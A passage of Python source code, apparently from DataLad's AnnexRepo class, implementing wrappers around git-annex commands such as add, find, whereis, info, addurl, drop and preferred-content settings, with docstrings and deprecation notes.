This removes as well as modifies index entries to match\n the working tree, but adds no new files.\n\n If no <pathspec> is given when --update option is used, all tracked\n files in the entire working tree are updated (old versions of Git\n used to limit the update to the current directory and its\n subdirectories).\n\n Note: Used only, if a call to git-add instead of git-annex-add is\n performed\n\n Returns\n -------\n list of dict or dict\n \"\"\"\n\n return list(self.add_(\n files, git=git, backend=backend, options=options, jobs=jobs,\n git_options=git_options, annex_options=annex_options, update=update\n ))\n\n def add_(self, files, git=None, backend=None, options=None, jobs=None,\n git_options=None, annex_options=None, update=False):\n \"\"\"Like `add`, but returns a generator\"\"\"\n if update and not git:\n raise InsufficientArgumentsError(\"option 'update' requires 'git', too\")\n\n if git_options:\n # TODO: note that below we would use 'add with --dry-run\n # so passed here options might need to be passed into it??\n lgr.warning(\"add: git_options not yet implemented. Ignored.\")\n\n if annex_options:\n lgr.warning(\"annex_options not yet implemented. Ignored.\")\n\n options = options[:] if options else []\n\n # TODO: RM DIRECT? not clear if this code didn't become \"generic\" and\n # not only \"direct mode\" specific, so kept for now.\n # Note: As long as we support direct mode, one should not call\n # super().add() directly. Once direct mode is gone, we might remove\n # `git` parameter and call GitRepo's add() instead.\n\n def _get_to_be_added_recs(paths):\n \"\"\"Try to collect what actually is going to be added\n\n This is used for progress information\n \"\"\"\n\n # TODO: RM DIRECT? might remain useful to detect submods left in direct mode\n # Note: if a path involves a submodule in direct mode, while we\n # are not in direct mode at current level, we might still fail.\n # Hence the except clause is still needed. However, this is\n # unlikely, since direct mode usually should be used only, if it\n # was enforced by FS and/or OS and therefore concerns the entire\n # hierarchy.\n _git_options = ['--dry-run', '-N', '--ignore-missing']\n try:\n for r in super(AnnexRepo, self).add_(\n files, git_options=_git_options, update=update):\n yield r\n return\n except CommandError as e:\n ce = CapturedException(e)\n # TODO: RM DIRECT? left for detection of direct mode submodules\n if AnnexRepo._is_annex_work_tree_message(e.stderr):\n raise DirectModeNoLongerSupportedError(\n self) from e\n raise\n\n # Theoretically we could have done for git as well, if it could have\n # been batched\n # Call git annex add for any to have full control of whether to go\n # to git or to annex\n # 1. 
Figure out what actually will be added\n to_be_added_recs = _get_to_be_added_recs(files)\n # collect their sizes for the progressbar\n expected_additions = {\n rec['file']: self.get_file_size(rec['file'])\n for rec in to_be_added_recs\n }\n\n # if None -- leave it to annex to decide\n if git is False:\n options.append(\"--force-large\")\n\n if git:\n # explicitly use git-add with --update instead of git-annex-add\n # TODO: This might still need some work, when --update AND files\n # are specified!\n for r in super(AnnexRepo, self).add(\n files,\n git=True,\n git_options=git_options,\n update=update):\n yield r\n\n else:\n if backend:\n options.extend(('--backend', backend))\n for r in self._call_annex_records(\n ['add'] + options,\n files=files,\n jobs=jobs,\n total_nbytes=sum(expected_additions.values())):\n yield r\n\n @normalize_paths\n def get_file_key(self, files, batch=None):\n \"\"\"DEPRECATED. Use get_content_annexinfo()\n\n See the method body for how to use get_content_annexinfo() to\n replace get_file_key().\n\n For single-file queries it is recommended to consider\n get_file_annexinfo()\n \"\"\"\n import warnings\n warnings.warn(\n \"AnnexRepo.get_file_key() is deprecated, \"\n \"use get_content_annexinfo() instead.\",\n DeprecationWarning)\n\n # this is only needed, because a previous implementation wanted to\n # disect reasons for not being able to report a key: file not there,\n # file in git, but not annexed. If not for that, this could be\n #init = None\n init = dict(\n zip(\n [self.pathobj / f for f in files],\n [{} for i in range(len(files))]\n )\n )\n info = self.get_content_annexinfo(\n files,\n init=init,\n )\n keys = [r.get('key', '') for r in info.values()]\n\n # everything below is only needed to achieve compatibility with the\n # complex behavior of a previous implementation if not for that, we\n # could achieve uniform behavior regardless of input specifics with a\n # simple\n #return keys\n\n if batch is not True and len(files) == 1 and '' in keys:\n not_found = [\n p\n for p, r in info.items()\n if r.get('success') is False and r.get('note') == 'not found'\n ]\n if not_found:\n raise FileNotInAnnexError(\n cmd='find',\n msg=f\"File not in annex: {not_found}\",\n filename=not_found)\n\n no_annex = [p for p, r in info.items() if not r]\n if no_annex:\n raise FileInGitError(\n cmd='find',\n msg=f\"File not in annex, but git: {no_annex}\",\n filename=no_annex)\n\n if batch is True and len(files) == 1 and len(keys) == 1:\n keys = keys[0]\n\n return keys\n\n @normalize_paths\n def unlock(self, files):\n \"\"\"unlock files for modification\n\n Note: This method is silent about errors in unlocking a file (e.g, the\n file has not content). Use the higher-level interface.unlock to get\n more informative reporting.\n\n Parameters\n ----------\n files: list of str\n\n Returns\n -------\n list of str\n successfully unlocked files\n \"\"\"\n if not files:\n return\n return [j[\"file\"] for j in\n self.call_annex_records([\"unlock\"], files=files)\n if j[\"success\"]]\n\n def adjust(self, options=None):\n \"\"\"enter an adjusted branch\n\n This command is only available in a v6+ git-annex repository.\n\n Parameters\n ----------\n options: list of str\n currently requires '--unlock' or '--fix';\n default: --unlock\n \"\"\"\n # TODO: Do we want to catch the case that\n # \"adjusted/<current_branch_name>(unlocked)\" already exists and\n # just check it out? 
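
Mirroring the get_file_key() deprecation note above, the replacement pattern looks like this (file name invented; `repo` is assumed to be an AnnexRepo instance):

    info = repo.get_content_annexinfo(['data.bin'])
    keys = [r.get('key', '') for r in info.values()]
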
Or fail like annex itself does?\n\n # version check:\n if not self.supports_unlocked_pointers:\n raise CommandNotAvailableError(\n cmd='git annex adjust',\n msg=('git-annex-adjust requires a '\n 'version that supports unlocked pointers'))\n\n options = options[:] if options else to_options(unlock=True)\n self.call_annex(['adjust'] + options)\n\n @normalize_paths\n def unannex(self, files, options=None):\n \"\"\"undo accidental add command\n\n Use this to undo an accidental git annex add command. Note that for\n safety, the content of the file remains in the annex, until you use git\n annex unused and git annex dropunused.\n\n Parameters\n ----------\n files: list of str\n options: list of str\n\n Returns\n -------\n list of str\n successfully unannexed files\n \"\"\"\n\n options = options[:] if options else []\n prefix = 'unannex'\n suffix = 'ok'\n return [\n # we cannot .split here since filename could have spaces\n self._unquote_annex_path(line[len(prefix) + 1 : -(len(suffix) + 1)])\n for line in self.call_annex_items_(['unannex'] + options, files=files)\n if line.split()[0] == prefix and line.split()[-1] == suffix\n ]\n\n @normalize_paths(map_filenames_back=True)\n def find(self, files, batch=False):\n \"\"\"Run `git annex find` on file(s).\n\n Parameters\n ----------\n files: list of str\n files to find under annex\n batch: bool, optional\n initiate or continue with a batched run of annex find, instead of just\n calling a single git annex find command. If any items in `files`\n are directories, this value is treated as False.\n\n Returns\n -------\n A dictionary the maps each item in `files` to its `git annex find`\n result. Items without a successful result will be an empty string, and\n multi-item results (which can occur for if `files` includes a\n directory) will be returned as a list.\n \"\"\"\n objects = {}\n # Ignore batch=True if any path is a directory because `git annex find\n # --batch` always returns an empty string for directories.\n if batch and not any(isdir(opj(self.path, f)) for f in files):\n find = self._batched.get(\n 'find', json=True, path=self.path,\n # Since we are just interested in local information\n git_options=['-c', 'annex.merge-annex-branches=false']\n )\n objects = {f: json_out.get(\"file\", \"\")\n for f, json_out in zip(files, find(files))}\n else:\n for f in files:\n try:\n res = self._call_annex(\n ['find', \"--print0\"],\n files=[f],\n merge_annex_branches=False,\n )\n items = res['stdout'].rstrip(\"\\0\").split(\"\\0\")\n objects[f] = items[0] if len(items) == 1 else items\n except CommandError:\n objects[f] = ''\n\n return objects\n\n def _check_files(self, fn, files, batch):\n # Helper that isolates the common logic in `file_has_content` and\n # `is_under_annex`. `fn` is the annex command used to do the check, and\n # `quick_fn` is the non-annex variant.\n pointers = self.supports_unlocked_pointers\n # We're only concerned about modified files in V6+ mode. 
In V5\n # `find` returns an empty string for unlocked files.\n #\n # ATTN: test_AnnexRepo_file_has_content has a failure before Git\n # v2.13 (tested back to v2.9) because this diff call unexpectedly\n # reports a type change as modified.\n modified = [\n f for f in self.call_git_items_(\n ['diff', '--name-only', '-z'], sep='\\0')\n if f] if pointers else []\n annex_res = fn(files, normalize_paths=False, batch=batch)\n return [bool(annex_res.get(f) and\n not (pointers and normpath(f) in modified))\n for f in files]\n\n @normalize_paths\n def file_has_content(self, files, allow_quick=False, batch=False):\n \"\"\"Check whether files have their content present under annex.\n\n Parameters\n ----------\n files: list of str\n file(s) to check for being actually present.\n allow_quick: bool, optional\n This is no longer supported.\n\n Returns\n -------\n list of bool\n For each input file states whether file has content locally\n \"\"\"\n # TODO: Also provide option to look for key instead of path\n return self._check_files(self.find, files, batch)\n\n @normalize_paths\n def is_under_annex(self, files, allow_quick=False, batch=False):\n \"\"\"Check whether files are under annex control\n\n Parameters\n ----------\n files: list of str\n file(s) to check for being under annex\n allow_quick: bool, optional\n This is no longer supported.\n\n Returns\n -------\n list of bool\n For each input file states whether file is under annex\n \"\"\"\n # theoretically in direct mode files without content would also be\n # broken symlinks on the FSs which support it, but that would complicate\n # the matters\n\n # This is an ugly hack to prevent files from being treated as\n # remotes by `git annex info`. See annex's `nameToUUID'`.\n files = [opj(curdir, f) for f in files]\n\n def check(files, **kwargs):\n # Filter out directories because it doesn't make sense to ask if\n # they are under annex control and `info` can only handle\n # non-directories.\n return self.info([f for f in files if not isdir(f)],\n fast=True, **kwargs)\n\n return self._check_files(check, files, batch)\n\n def init_remote(self, name, options):\n \"\"\"Creates a new special remote\n\n Parameters\n ----------\n name: str\n name of the special remote\n \"\"\"\n # TODO: figure out consistent way for passing options + document\n self.call_annex(['initremote'] + [name] + options)\n self.config.reload()\n\n def enable_remote(self, name, options=None, env=None):\n \"\"\"Enables use of an existing special remote\n\n Parameters\n ----------\n name: str\n name, the special remote was created with\n options: list, optional\n \"\"\"\n\n # MIH thinks there should be no `env` argument at all\n # https://github.com/datalad/datalad/issues/5162\n env = env or self._git_runner.env\n try:\n from unittest.mock import patch\n with patch.object(self._git_runner, 'env', env):\n # TODO: outputs are nohow used/displayed. 
Eventually convert to\n # to a generator style yielding our \"dict records\"\n self.call_annex(['enableremote', name] + ensure_list(options))\n except CommandError as e:\n if re.match(r'.*StatusCodeException.*statusCode = 401', e.stderr):\n raise AccessDeniedError(e.stderr)\n elif 'FailedConnectionException' in e.stderr:\n raise AccessFailedError(e.stderr)\n else:\n raise e\n self.config.reload()\n\n def merge_annex(self, remote=None): # do not use anymore, use localsync()\n self.localsync(remote)\n\n def sync(self, remotes=None, push=True, pull=True, commit=True,\n content=False, all=False, fast=False):\n \"\"\"This method is deprecated, use call_annex(['sync', ...]) instead.\n\n Synchronize local repository with remotes\n\n Use this command when you want to synchronize the local repository\n with one or more of its remotes. You can specify the remotes (or\n remote groups) to sync with by name; the default if none are specified\n is to sync with all remotes.\n\n Parameters\n ----------\n remotes: str, list(str), optional\n Name of one or more remotes to be sync'ed.\n push : bool\n By default, git pushes to remotes.\n pull : bool\n By default, git pulls from remotes\n commit : bool\n A commit is done by default. Disable to avoid committing local\n changes.\n content : bool\n Normally, syncing does not transfer the contents of annexed\n files. This option causes the content of files in the work tree\n to also be uploaded and downloaded as necessary.\n all : bool\n This option, when combined with `content`, makes all available\n versions of all files be synced, when preferred content settings\n allow\n fast : bool\n Only sync with the remotes with the lowest annex-cost value\n configured\n \"\"\"\n import warnings\n warnings.warn(\n \"AnnexRepo.sync() is deprecated, use call_annex(['sync', ...]) \"\n \"instead.\",\n DeprecationWarning)\n args = []\n args.extend(to_options(push=push, no_push=not push,\n # means: '--push' if push else '--no-push'\n pull=pull, no_pull=not pull,\n commit=commit, no_commit=not commit,\n content=content, no_content=not content,\n all=all,\n fast=fast))\n args.extend(ensure_list(remotes))\n self.call_annex(['sync'] + args)\n\n @normalize_path\n def add_url_to_file(self, file_, url, options=None, backend=None,\n batch=False, git_options=None, annex_options=None,\n unlink_existing=False):\n \"\"\"Add file from url to the annex.\n\n Downloads `file` from `url` and add it to the annex.\n If annex knows `file` already,\n records that it can be downloaded from `url`.\n\n Note: Consider using the higher-level `download_url` instead.\n\n Parameters\n ----------\n file_: str\n\n url: str\n\n options: list\n options to the annex command\n\n batch: bool, optional\n initiate or continue with a batched run of annex addurl, instead of just\n calling a single git annex addurl command\n\n unlink_existing: bool, optional\n by default crashes if file already exists and is under git.\n With this flag set to True would first remove it.\n\n Returns\n -------\n dict\n In batch mode only ATM returns dict representation of json output returned\n by annex\n \"\"\"\n\n if git_options:\n lgr.warning(\"add_url_to_file: git_options not yet implemented. Ignored.\")\n\n if annex_options:\n lgr.warning(\"annex_options not yet implemented. 
Ignored.\")\n\n options = options[:] if options else []\n if backend:\n options.extend(('--backend', backend))\n git_options = []\n if lexists(opj(self.path, file_)) and \\\n unlink_existing and \\\n not self.is_under_annex(file_):\n # already under git, we can't addurl for under annex\n lgr.warning(\n \"File %s:%s is already under git, removing so it could possibly\"\n \" be added under annex\", self, file_\n )\n unlink(opj(self.path, file_))\n if not batch or self.fake_dates_enabled:\n if batch:\n lgr.debug(\"Not batching addurl call \"\n \"because fake dates are enabled\")\n files_opt = '--file=%s' % file_\n out_json = self._call_annex_records(\n ['addurl'] + options + [files_opt] + [url],\n progress=True,\n )\n if len(out_json) != 1:\n raise AssertionError(\n \"should always be a single-item list, Got: %s\"\n % str(out_json))\n # Make the output's structure match bcmd's.\n out_json = out_json[0]\n # Don't capture stderr, since download progress provided by wget\n # uses stderr.\n else:\n options += ['--with-files']\n if backend:\n options += ['--backend=%s' % backend]\n # Initializes (if necessary) and obtains the batch process\n bcmd = self._batched.get(\n # Since backend will be critical for non-existing files\n 'addurl_to_file_backend:%s' % backend,\n annex_cmd='addurl',\n git_options=git_options,\n annex_options=options, # --raw ?\n path=self.path,\n json=True\n )\n try:\n out_json = bcmd((url, file_))\n except Exception as exc:\n # if isinstance(exc, IOError):\n # raise\n raise AnnexBatchCommandError(\n cmd=\"addurl\",\n msg=\"Adding url %s to file %s failed\" % (url, file_)) from exc\n assert \\\n (out_json.get('command') == 'addurl'), \\\n \"no exception was raised and no 'command' in result out_json=%s\" % str(out_json)\n if not out_json.get('success', False):\n raise (AnnexBatchCommandError if batch else CommandError)(\n cmd=\"addurl\",\n msg=\"Error, annex reported failure for addurl (url='%s'): %s\"\n % (url, str(out_json)))\n return out_json\n\n def add_urls(self, urls, options=None, backend=None, cwd=None,\n jobs=None,\n git_options=None, annex_options=None):\n \"\"\"Downloads each url to its own file, which is added to the annex.\n\n .. deprecated:: 0.17\n Use add_url_to_file() or call_annex() instead.\n\n Parameters\n ----------\n urls: list of str\n\n options: list, optional\n options to the annex command\n\n cwd: string, optional\n working directory from within which to invoke git-annex\n \"\"\"\n warnings.warn(\n \"AnnexRepo.add_urls() is deprecated and will be removed in a \"\n \"future release. Use AnnexRepo.add_url_to_file() or \"\n \"AnnexRepo.call_annex() instead.\",\n DeprecationWarning)\n\n if git_options:\n lgr.warning(\"add_urls: git_options not yet implemented. Ignored.\")\n\n git_options = []\n if cwd:\n git_options.extend(('-C', cwd))\n\n if annex_options:\n lgr.warning(\"annex_options not yet implemented. 
Ignored.\")\n\n options = options[:] if options else []\n\n if backend:\n options.extend(('--backend', backend))\n\n return self._call_annex_records(\n ['addurl'] + options + urls,\n git_options=git_options,\n progress=True)\n\n @normalize_path\n def rm_url(self, file_, url):\n \"\"\"Record that the file is no longer available at the url.\n\n Parameters\n ----------\n file_: str\n\n url: str\n \"\"\"\n self.call_annex(['rmurl'], files=[file_, url])\n\n @normalize_path\n def get_urls(self, file_, key=False, batch=False):\n \"\"\"Get URLs for a file/key\n\n Parameters\n ----------\n file_: str\n key: bool, optional\n Whether provided files are actually annex keys\n\n Returns\n -------\n A list of URLs\n \"\"\"\n locations = self.whereis(file_, output='full', key=key, batch=batch)\n return locations.get(WEB_SPECIAL_REMOTE_UUID, {}).get('urls', [])\n\n @normalize_paths\n def drop(self, files, options=None, key=False, jobs=None):\n \"\"\"Drops the content of annexed files from this repository.\n\n Drops only if possible with respect to required minimal number of\n available copies.\n\n Parameters\n ----------\n files: list of str\n paths to drop\n options : list of str, optional\n commandline options for the git annex drop command\n jobs : int, optional\n how many jobs to run in parallel (passed to git-annex call)\n\n Returns\n -------\n list(JSON objects)\n 'success' item in each object indicates failure/success per file\n path.\n \"\"\"\n\n # annex drop takes either files or options\n # --all, --unused, --key, or --incomplete\n # for now, most simple test; to be replaced by a more general solution\n # (exception thrown by _run_annex_command)\n if not files and \\\n (not options or\n not any([o in options for o in\n [\"--all\", \"--unused\", \"--key\", \"--incomplete\"]])):\n raise InsufficientArgumentsError(\"drop() requires at least to \"\n \"specify 'files' or 'options'\")\n\n options = ensure_list(options)\n\n if key:\n # we can't drop multiple in 1 line, and there is no --batch yet, so\n # one at a time\n files = ensure_list(files)\n options = options + ['--key']\n res = [\n self._call_annex_records(\n ['drop'] + options + [k],\n jobs=jobs)\n for k in files\n ]\n # `normalize_paths` ... 
magic, useful?\n if len(files) == 1:\n return res[0]\n else:\n return res\n else:\n return self._call_annex_records(\n ['drop'] + options,\n files=files,\n jobs=jobs)\n\n def drop_key(self, keys, options=None, batch=False):\n \"\"\"Drops the content of annexed files from this repository referenced by keys\n\n Dangerous: it drops without checking for required minimal number of\n available copies.\n\n Parameters\n ----------\n keys: list of str, str\n\n batch: bool, optional\n initiate or continue with a batched run of annex dropkey, instead of just\n calling a single git annex dropkey command\n \"\"\"\n keys = [keys] if isinstance(keys, str) else keys\n\n options = options[:] if options else []\n options += ['--force']\n if not batch or self.fake_dates_enabled:\n if batch:\n lgr.debug(\"Not batching drop_key call \"\n \"because fake dates are enabled\")\n json_objects = self.call_annex_records(\n ['dropkey'] + options, files=keys\n )\n else:\n json_objects = self._batched.get(\n 'dropkey',\n annex_options=options, json=True, path=self.path\n )(keys)\n # TODO: RF to be consistent with the rest (IncompleteResultError or alike)\n # and/or completely refactor since drop above also has key option\n for j in json_objects:\n assert j.get('success', True)\n\n # TODO: a dedicated unit-test\n def _whereis_json_to_dict(self, j):\n \"\"\"Convert json record returned by annex whereis --json to our dict representation for it\n \"\"\"\n # process 'whereis' containing list of remotes\n remotes = {remote['uuid']: {x: remote.get(x, None)\n for x in ('description', 'here', 'urls')\n }\n for remote in j['whereis']}\n return remotes\n\n # TODO: reconsider having any magic at all and maybe just return a list/dict always\n @normalize_paths\n def whereis(self, files, output='uuids', key=False, options=None, batch=False):\n \"\"\"Lists repositories that have actual content of file(s).\n\n Parameters\n ----------\n files: list of str\n files to look for\n output: {'descriptions', 'uuids', 'full'}, optional\n If 'descriptions', a list of remotes descriptions returned is per\n each file. If 'full', for each file a dictionary of all fields\n is returned as returned by annex\n key: bool, optional\n Whether provided files are actually annex keys\n options: list, optional\n Options to pass into git-annex call\n\n Returns\n -------\n list of list of unicode or dict\n if output == 'descriptions', contains a list of descriptions of remotes\n for each input file, describing the remote for each remote, which\n was found by git-annex whereis, like::\n\n u'me@mycomputer:~/where/my/repo/is [origin]' or\n u'web' or\n u'me@mycomputer:~/some/other/clone'\n\n if output == 'uuids', returns a list of uuids.\n if output == 'full', returns a dictionary with filenames as keys\n and values a detailed record, e.g.::\n\n {'00000000-0000-0000-0000-000000000001': {\n 'description': 'web',\n 'here': False,\n 'urls': ['http://127.0.0.1:43442/about.txt', 'http://example.com/someurl']\n }}\n \"\"\"\n OUTPUTS = {'descriptions', 'uuids', 'full'}\n if output not in OUTPUTS:\n raise ValueError(\n \"Unknown value output=%r. 
Known are %s\"\n % (output, ', '.join(map(repr, OUTPUTS)))\n )\n\n options = ensure_list(options, copy=True)\n if batch:\n # TODO: --batch-keys was added to 8.20210903\n if key:\n if not self._check_version_kludges(\"grp1-supports-batch-keys\"):\n raise ValueError(\"batch=True for `key=True` requires git-annex >= 8.20210903\")\n bkw = {'batch_opt': '--batch-keys'}\n else:\n bkw = {}\n bcmd = self._batched.get('whereis', annex_options=options,\n json=True, path=self.path, **bkw)\n json_objects = bcmd(files)\n else:\n cmd = ['whereis'] + options\n\n def _call_cmd(cmd, files=None):\n \"\"\"Helper to reuse consistently in case of --key and not invocations\"\"\"\n try:\n return self.call_annex_records(cmd, files=files)\n except CommandError as e:\n if e.stderr.startswith('Invalid'):\n # would happen when git-annex is called with incompatible options\n raise\n # whereis may exit non-zero when there are too few known copies\n # callers of whereis are interested in exactly that information,\n # which we deliver via result, not via exception\n return e.kwargs.get('stdout_json', [])\n\n if key:\n # whereis --key takes only a single key at a time so we need to loop\n json_objects = []\n for k in files:\n json_objects.extend(_call_cmd(cmd + [\"--key\", k]))\n else:\n json_objects = _call_cmd(cmd, files)\n\n # json_objects can contain entries w/o a \"whereis\" field. Unknown to\n # git paths in particular are returned in such records. Code below is\n # only concerned with actual whereis results.\n whereis_json_objects = [o for o in json_objects if \"whereis\" in\n o.keys()]\n\n if output in {'descriptions', 'uuids'}:\n return [\n [remote.get(output[:-1]) for remote in j.get('whereis')]\n if j.get('success') else []\n for j in whereis_json_objects\n ]\n elif output == 'full':\n # TODO: we might want to optimize storage since many remotes entries will be the\n # same so we could just reuse them instead of brewing copies\n return {\n j['key']\n if (key or '--all' in options)\n # report is always POSIX, but normalize_paths wants to match against\n # the native representation\n else str(Path(PurePosixPath(j['file'])))\n if on_windows else j['file']\n : self._whereis_json_to_dict(j)\n for j in whereis_json_objects\n if not j.get('key', '').endswith('.this-is-a-test-key')\n }\n\n # TODO:\n # I think we should make interface cleaner and less ambiguous for those annex\n # commands which could operate on globs, files, and entire repositories, separating\n # those out, e.g. 
annex_info_repo, annex_info_files at least.\n # If we make our calling wrappers work without relying on invoking from repo topdir,\n # then returned filenames would not need to be mapped, so we could easily work on dirs\n # and globs.\n # OR if explicit filenames list - return list of matching entries, if globs/dirs -- return dict?\n @normalize_paths(map_filenames_back=True)\n def info(self, files, batch=False, fast=False):\n \"\"\"Provide annex info for file(s).\n\n Parameters\n ----------\n files: list of str\n files to look for\n\n Returns\n -------\n dict\n Info for each file\n \"\"\"\n\n options = ['--bytes', '--fast'] if fast else ['--bytes']\n\n if not batch:\n json_objects = self._call_annex_records(\n ['info'] + options, files=files, merge_annex_branches=False,\n exception_on_error=False,\n )\n else:\n # according to passing of the test_AnnexRepo_is_under_annex\n # test with batch=True, there is no need for explicit\n # exception_on_error=False, batched process does not raise\n # CommandError.\n json_objects = self._batched.get(\n 'info',\n annex_options=options, json=True, path=self.path,\n git_options=['-c', 'annex.merge-annex-branches=false']\n )(files)\n\n # Some aggressive checks. ATM info can be requested only per file\n # json_objects is a generator, let's keep it that way\n # assert(len(json_objects) == len(files))\n # and that they all have 'file' equal to the passed one\n out = {}\n for j, f in zip(json_objects, files):\n # Starting with version of annex 8.20200330-100-g957a87b43\n # annex started to normalize relative paths.\n # ref: https://github.com/datalad/datalad/issues/4431\n # Use normpath around each side to ensure it is the same file\n assert normpath(j.pop('file')) == normpath(f)\n if not j['success']:\n j = None\n else:\n assert(j.pop('success') is True)\n # convert size to int\n j['size'] = int(j['size']) if 'unknown' not in j['size'] else None\n # and pop the \"command\" field\n j.pop(\"command\")\n out[f] = j\n return out\n\n def repo_info(self, fast=False, merge_annex_branches=True):\n \"\"\"Provide annex info for the entire repository.\n\n Parameters\n ----------\n fast : bool, optional\n Pass `--fast` to `git annex info`.\n merge_annex_branches : bool, optional\n Whether to allow git-annex if needed to merge annex branches, e.g. to\n make sure up to date descriptions for git annex remotes\n\n Returns\n -------\n dict\n Info for the repository, with keys matching the ones returned by annex\n \"\"\"\n\n options = ['--bytes', '--fast'] if fast else ['--bytes']\n\n json_records = list(self._call_annex_records(\n ['info'] + options, merge_annex_branches=merge_annex_branches)\n )\n assert(len(json_records) == 1)\n\n # TODO: we need to abstract/centralize conversion from annex fields\n # For now just tune up few for immediate usability\n info = json_records[0]\n for k in info:\n if k.endswith(' size') or k.endswith(' disk space') or k.startswith('size of '):\n size = info[k].split()[0]\n if size.isdigit():\n info[k] = int(size)\n else:\n lgr.debug(\"Size %r reported to be %s, setting to None\", k, size)\n info[k] = None\n assert(info.pop('success'))\n assert(info.pop('command') == 'info')\n return info # just as is for now\n\n def get_annexed_files(self, with_content_only=False, patterns=None):\n \"\"\"Get a list of files in annex\n\n Parameters\n ----------\n with_content_only : bool, optional\n Only list files whose content is present.\n patterns : list, optional\n Globs to pass to annex's `--include=`. 
Files that match any of\n these will be returned (i.e., they'll be separated by `--or`).\n\n Returns\n -------\n A list of POSIX file names\n \"\"\"\n if not patterns:\n args = [] if with_content_only else ['--include', \"*\"]\n else:\n if len(patterns) == 1:\n args = ['--include', patterns[0]]\n else:\n args = ['-(']\n for pat in patterns[:-1]:\n args.extend(['--include', pat, \"--or\"])\n args.extend(['--include', patterns[-1]])\n args.append('-)')\n\n if with_content_only:\n args.extend(['--in', '.'])\n # TODO: JSON\n return list(\n self.call_annex_items_(\n ['find', '-c', 'annex.merge-annex-branches=false'] + args))\n\n def get_preferred_content(self, property, remote=None):\n \"\"\"Get preferred content configuration of a repository or remote\n\n Parameters\n ----------\n property : {'wanted', 'required', 'group'}\n Type of property to query\n remote : str, optional\n If not specified (None), returns the property for the local\n repository.\n\n Returns\n -------\n str\n Whether the setting is returned, or `None` if there is none.\n\n Raises\n ------\n ValueError\n If an unknown property label is given.\n\n CommandError\n If the annex call errors.\n \"\"\"\n if property not in ('wanted', 'required', 'group'):\n raise ValueError(\n 'unknown preferred content property: {}'.format(property))\n return self.call_annex_oneline([property, remote or '.']) or None\n\n def set_preferred_content(self, property, expr, remote=None):\n \"\"\"Set preferred content configuration of a repository or remote\n\n Parameters\n ----------\n property : {'wanted', 'required', 'group'}\n Type of property to query\n expr : str\n Any expression or label supported by git-annex for the\n given property.\n remote : str, optional\n If not specified (None), sets the property for the local\n repository.\n\n Returns\n -------\n str\n Raw git-annex output in response to the set command.\n\n Raises\n ------\n ValueError\n If an unknown property label is given.\n\n CommandError\n If the annex call errors.\n \"\"\"\n if property not in ('wanted', 'required', 'group'):\n raise ValueError(\n 'unknown preferred content property: {}'.format(property))\n return self.call_annex_oneline([property, remote or '.', expr])\n\n def get_groupwanted(self, name):\n \"\"\"Get `groupwanted` expression for a group `name`\n\n Parameters\n ----------\n name : str\n Name of the groupwanted group\n \"\"\"\n return self.call_annex_oneline(['groupwanted', name])\n\n def set_groupwanted(self, name, expr):\n \"\"\"Set `expr` for the `name` groupwanted\"\"\"\n return self.call_annex_oneline(['groupwanted', name, expr])\n\n def precommit(self):\n \"\"\"Perform pre-commit maintenance tasks, such as closing all batched annexes\n since they might still need to flush their changes into index\n \"\"\"\n if self._batched is not None:\n self._batched.close()\n super(AnnexRepo, self).precommit()\n\n def get_contentlocation(self, key, batch=False):\n \"\"\"Get location of the key content\n\n Normally under .git/annex objects in indirect mode and within file\n tree in direct mode.\n\n Unfortunately there is no (easy) way to discriminate situations\n when given key is simply incorrect (not known to annex) or its content\n not currently present -- in both cases annex just silently exits with -1\n\n\n Parameters\n ----------\n key: str\n key\n batch: bool, optional\n initiate or continue with a batched run of annex contentlocation\n\n Returns\n -------\n str\n path relative to the top directory of the repository. 
If no content\n is present, empty string is returned\n \"\"\"\n\n if not batch:\n try:\n return next(self.call_annex_items_(['contentlocation', key]))\n except CommandError:\n return ''\n else:\n return self._batched.get('contentlocation', path=self.path)(key)\n\n @normalize_paths(serialize=True)\n def is_available(self, file_, remote=None, key=False, batch=False):\n \"\"\"Check if file or key is available (from a remote)\n\n In case if key or remote is misspecified, it wouldn't fail but just keep\n returning False, although possibly also complaining out loud ;)\n\n Parameters\n ----------\n file_: str\n Filename or a key\n remote: str, optional\n Remote which to check. If None, possibly multiple remotes are checked\n before positive result is reported\n key: bool, optional\n Whether provided files are actually annex keys\n batch: bool, optional\n Initiate or continue with a batched run of annex checkpresentkey\n\n Returns\n -------\n bool\n with True indicating that file/key is available from (the) remote\n \"\"\"\n\n if key:\n key_ = file_\n else:\n # TODO with eval_availability=True, the following call\n # would already provide the answer to is_available? for\n # the local annex\n key_ = self.get_file_annexinfo(file_)['key'] # ?, batch=batch\n\n annex_input = [key_,] if not remote else [key_, remote]\n\n if not batch:\n return self.call_annex_success(['checkpresentkey'] + annex_input)\n else:\n annex_cmd = [\"checkpresentkey\"] + ([remote] if remote else [])\n try:\n out = self._batched.get(\n ':'.join(annex_cmd), annex_cmd,\n path=self.path)(key_)\n except CommandError:\n # git-annex runs in batch mode, but will still signal some\n # errors, e.g. an unknown remote, by exiting with a non-zero\n # return code.\n return False\n try:\n return {\n # happens on travis in direct/heavy-debug mode, that process\n # exits and closes stdout (upon unknown key) before we could\n # read it, so we get None as the stdout.\n # see https://github.com/datalad/datalad/issues/2330\n # but it is associated with an unknown key, and for consistency\n # we report False there too, as to ''\n None: False,\n '': False, # when remote is misspecified ... stderr carries the msg\n '0': False,\n '1': True,\n }[out]\n except KeyError:\n raise ValueError(\n \"Received output %r from annex, whenever expect 0 or 1\" % out\n )\n\n @normalize_paths\n def migrate_backend(self, files, backend=None):\n \"\"\"Changes the backend used for `file`.\n\n The backend used for the key-value of `files`. Only files currently\n present are migrated.\n Note: There will be no notification if migrating fails due to the\n absence of a file's content!\n\n Parameters\n ----------\n files: list\n files to migrate.\n backend: str\n specify the backend to migrate to. 
